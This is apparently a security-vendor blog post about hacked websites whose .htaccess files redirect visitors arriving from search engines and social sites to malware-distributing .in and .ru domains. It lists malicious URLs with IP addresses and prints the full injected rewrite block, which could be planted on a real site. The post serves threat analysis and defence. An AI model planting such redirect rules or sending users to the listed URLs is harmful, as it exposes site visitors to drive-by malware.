The New (and Old) .htaccess Attacks – Now Using .in Domains

We have been talking about .htaccess redirections for a while. A site gets compromised and the attackers modify the .htaccess file(s) to redirect any search engine traffic to a different (malicious) page that attempts to compromise the browser / computer of anyone visiting the site.

For the most part, the attackers have been using .ru domains to distribute the malware. Here are some of the domains used:

face-apple.ru
fightagent.ru
power-update.ru
syntaxswitch.ru
window-switch.ru


There are hundreds of others, however, we are now seeing a shift where most of the domains being used are in the .in TLD. Check out our Global Malware View to see a bit more detail:

http://setting-appic.in/filter/index.php

http://settingappic.in/ecran/index.php

http://appicsetting.in/riba/index.php

http://geografycsturtup.in/apoz/index.php

http://mistyc-faraon.in/mudio/index.php

http://settingappic.in/ecran/index.php (95.163.89.204)

http://loginnewman.in/vooz/index.php

http://pills.ind.in/in.cgi?4 (184.107.238.26)
http://security-tvoya.in/banan/index.php (66.197.168.198)
http://software-mahalai.in/fason/index.php (66.197.168.198)

http://payment-glonas.in/position/index.php

http://masaskisoft.in/ahalai/index.php (66.197.168.199)
http://assistantbilling.in/proccess/index.php (64.120.151.70)
.. and more..

The .htaccess modifications being made by the attacks are a now a little different as well:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|
netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|
metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|
yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|
webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|
entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|
teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|
metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|
galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|
fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|
abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|
suchmaschine|web-archiv|web|websuche|witch|wolong|oekoportal|t-online|
freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|
kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|
bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|
ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|
findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|
kingdomseek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|
uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|
findloo|kobala|limier|express|bestireland|browseireland|iesearch|
ireland-information|kompass|startsiden|confex|finnalle|gulesider|
keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|
chapu|claymont|clickz|clush|ehow|findhow|icq|goo|
westaustraliaonline)\.(.*)

RewriteRule ^(.*)$ http://settingappic.in/ecran/index.php [R=301,L]

They are listing a lot of major sites/search engines, and redirecting visitors that come in from those sites.

How are sites getting hacked?

Most redirect malware cases we see can be attributed (attack vector) to outdated software(WordPress, Joomla, Timthumb, etc), or your exploited FTP/SFTP (Infected local machines).


Is your site hacked? Scan it here to verify: http://sitecheck.sucuri.net or sign up here to get it cleaned.

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.